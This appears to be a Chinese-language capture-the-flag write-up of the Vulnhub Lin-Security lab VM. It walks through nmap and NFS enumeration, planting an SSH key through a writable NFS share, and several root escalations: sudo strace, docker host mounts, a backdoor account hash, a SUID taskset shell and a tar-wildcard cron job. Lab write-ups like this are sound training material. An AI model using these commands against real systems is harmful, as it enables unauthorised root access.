Vulnhub-Lin-Security

靶机下载链接

0x01 信息收集

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ nmap -p- 192.168.56.7 -T5 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 07:39 EDT
Nmap scan report for 192.168.56.7
Host is up (0.0019s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35075/tcp mountd
| 100005 1,2,3 39585/tcp6 mountd
| 100005 1,2,3 40841/udp mountd
| 100005 1,2,3 57399/udp6 mountd
| 100021 1,3,4 37289/tcp6 nlockmgr
| 100021 1,3,4 39940/udp6 nlockmgr
| 100021 1,3,4 46833/tcp nlockmgr
| 100021 1,3,4 51407/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35075/tcp open mountd 1-3 (RPC #100005)
41139/tcp open mountd 1-3 (RPC #100005)
46833/tcp open nlockmgr 1-4 (RPC #100021)
58497/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds

NFS探测

1
2
3
4
5
6
7
8
9
10
11
nmap -p 111 --script=nfs* 192.168.56.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 07:40 EDT
Nmap scan report for 192.168.56.7
Host is up (0.00092s latency).

PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /home/peter *

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

0x02 漏洞利用

Walktrough-1

我这里首先是去利用nfs配置的错误。

1
2
3
4
5
6
7
8
9
mkdir ~/home
sudo mount -o nolock 192.168.56.7:/home/ /home/kali/home/
sudo grounpadd -g 1005 peter
sudo adduser peter -uid 1001 -gid 1005

su peter
ssh-keygen
cat ~/home/.ssh/id_rsa.pub >/home/kali/home/peter/.ssh/authorized_keys
ssh [email protected]

提权-1

1
2
3
4
5
6
[email protected]:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
1
2
3
4
[email protected]:~$ sudo strace -o /dev/null /bin/sh
#id
uid=0(root) gid=0(root) groups=0(root)
#

提权-2

1
2
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
cat /etc/passwd

docker内部的/etc/passwd和外部的/etc/passwd一样,所以,可以直接往里面添加个用户。实现提权。

提权-3

在上面查看的/etc/passwd发现一个后门用户

1
2
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
username:passwd:uid:gid:::shell

JTR加密,需要去解码后用密码登录。登录就是root

提权-4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
find / -type f -perm -u=s 2>/dev/null

/bin/ping
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/bin/su
/bin/mount
/usr/bin/pkexec
/usr/bin/netkit-rlogin
/usr/bin/xxd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/netkit-rcp
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/netkit-rsh
/usr/bin/taskset
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/sbin/mount.nfs

运行

1
taskset 1 /bin/sh -p

提权-5

使用bob用户

1
2
3
4
5
6
7
8
[email protected]:/home/peter$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat,
/usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

都是提权方式。

提权-6

1
2
3
4
5
6
cat /etc/crontab

*/1 * * * * root /etc/cron.daily/backup

#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done

可以tar通配符提权。

0x03 总结

这个靶机对我最大的帮助是让我复现了NFS共享目录可写的漏洞。其他的感觉都做过。。不过还有其他的提权方式我没一一复现。十分偏向新手。